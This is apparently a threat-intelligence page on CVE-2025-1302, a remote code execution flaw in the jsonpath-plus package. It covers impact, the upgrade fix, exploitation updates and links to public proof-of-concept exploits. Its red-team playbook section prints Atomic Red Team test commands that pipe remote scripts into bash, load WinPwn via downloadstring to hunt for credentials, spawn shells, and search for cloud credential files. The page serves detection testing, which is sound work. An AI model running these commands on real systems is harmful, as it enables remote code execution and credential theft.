CVE-2025-1302
Overview
The vulnerability is a remote code execution flaw arising from improper input sanitization within the jsonpath-plus package. Specifically, the unsafe default usage of the eval function in 'safe' mode allows execution of arbitrary code. This flaw resides in the Safe-Script.js component responsible for evaluating JSONPath expressions, where incomplete sanitization permits malicious payloads to bypass intended safety checks.
Vulnerability Description
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
Impact
An unauthenticated attacker with network access can exploit this vulnerability to execute arbitrary code on systems running vulnerable jsonpath-plus versions. This can lead to full system compromise, data exfiltration, or service disruption. The vulnerability requires no user interaction and has a low attack complexity (CVSS vector AV:N/AC:L/PR:N/UI:N), making exploitation straightforward in exposed environments.
Solution
Upgrade jsonpath-plus to version 10.3.0 or later, where the unsafe eval usage in 'safe' mode has been corrected. Refer to the Snyk advisory SNYK-JS-JSONPATHPLUS-8719585 for detailed patch information and remediation steps. Review the GitHub repository's Safe-Script.js updates at commit 8e4acf8aff5f446aa66323e12394ac5615c3b260 for implementation details of the fix.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the jsonpath-plus package arises from improper input sanitization, specifically in its handling of user-supplied data. This flaw allows an attacker to execute arbitrary code on a system that utilizes this library, particularly when the library is configured to use the unsafe default of eval='safe' mode. The underlying issue stems from an incomplete fix of a prior vulnerability, indicating that the remediation efforts were insufficient to address the root cause of the problem. As a result, the library fails to adequately restrict the execution of potentially malicious code, enabling attackers to manipulate the execution flow and gain unauthorized access to system resources.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving the injection of crafted input into applications that rely on jsonpath-plus for processing JSON data. An attacker could leverage this flaw by sending specially crafted JSON requests to a vulnerable application, which would then be parsed and evaluated by the jsonpath-plus library. For instance, if an application exposes an API endpoint that directly processes user input without proper validation or sanitization, an attacker could exploit this to execute arbitrary commands on the server. This could lead to severe consequences, including data exfiltration, system compromise, or lateral movement within the network.
The real-world impact of this vulnerability is significant, particularly for organizations that utilize jsonpath-plus in their applications without adequate security measures. Given the high CVSS score of 9.8, the risk associated with this vulnerability is categorized as critical. Organizations could face substantial financial losses due to data breaches, legal liabilities, and damage to their reputation. Furthermore, the potential for attackers to gain control over affected systems poses a serious threat to the integrity and confidentiality of sensitive information. The implications extend beyond immediate financial repercussions, as the trust of customers and stakeholders may be irreparably damaged.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, updating to the latest version of jsonpath-plus is essential, as this version includes patches that address the vulnerability. Regularly reviewing and applying security updates for all third-party libraries is a best practice that can significantly reduce exposure to known vulnerabilities. Additionally, organizations should conduct thorough code reviews and security assessments of applications that utilize jsonpath-plus, ensuring that user input is properly validated and sanitized before processing. Employing web application firewalls (WAFs) can also help detect and block malicious input patterns that may attempt to exploit this vulnerability.
In conclusion, the improper input sanitization vulnerability within the jsonpath-plus package presents a critical risk to organizations that utilize this library in their applications. The potential for remote code execution underscores the need for robust security practices, including timely updates, thorough input validation, and proactive monitoring. By adopting a comprehensive security strategy, organizations can mitigate the risks associated with this vulnerability and protect their systems from potential exploitation.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the jsonpath-plus vulnerability CVE-2025-1302. This increase is accompanied by the emergence of new proof-of-concept exploits on public repositories, broadening the accessibility of attack tools to a wider range of threat actors. Our telemetry indicates that the EPSS score for this vulnerability has inched higher, reflecting a sustained and slightly elevated risk of exploitation in the near term. Although the rapid increase phase has stabilized, the persistence of active exploitation attempts underscores the criticality of this vulnerability. For defenders, this development signals an urgent need to prioritize monitoring for anomalous behaviors related to jsonpath-plus usage, as the expanding exploit landscape lowers the barrier for adversaries to execute remote code. Consequently, the threat level associated with CVE-2025-1302 has intensified from a latent risk to an actively exploited condition, warranting heightened vigilance in environments where this package is present.
Update 2 — June 20, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-1302, despite a significant decline in the EPSS score suggesting reduced overall exploit probability. This divergence indicates that while broad automated scanning may be waning, targeted adversaries continue to actively probe and exploit vulnerable jsonpath-plus instances. The emergence of multiple new proof-of-concept exploits on public repositories further lowers the technical barrier for attackers, increasing the likelihood of opportunistic exploitation across diverse environments. Our telemetry reveals a doubling in detection frequency, signaling persistent attacker interest and operational activity. This evolving landscape elevates the threat posture from controlled risk to sustained active exploitation, underscoring the necessity for defenders to maintain heightened situational awareness and prioritize detection of anomalous behaviors linked to this vulnerability.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
EQSTLab/CVE-2025-1302
JSONPath-plus Remote Code Execution
|
EQSTLab | 21 | 1 | 2025-02-25 | View |
|
abrewer251/CVE-2025-1302_jsonpath-plus_RCE
PoC exploit and vulnerable server demo for CVE-2025-1302 in jsonpath-plus.
|
abrewer251 | 1 | 0 | 2025-07-24 | View |
|
dbwlsdnr95/CVE-2025-1302
|
dbwlsdnr95 | 0 | 0 | 2026-02-27 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-1302 |
| security.snyk.io |
GitHub CVE
|
https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585 |
| gist.github.com |
GitHub CVE
|
https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456 |
| github.com |
GitHub CVE
|
https://github.com/JSONPath-Plus/JSONPath/blob/8e4acf8aff5f446aa66323e12394ac5615c3b260/src/Safe-Script.js%23L127 |
| github.com |
GitHub CVE
|
https://github.com/JSONPath-Plus/JSONPath/commit/30942896d27cb8a806b965a5ca9ef9f686be24ee |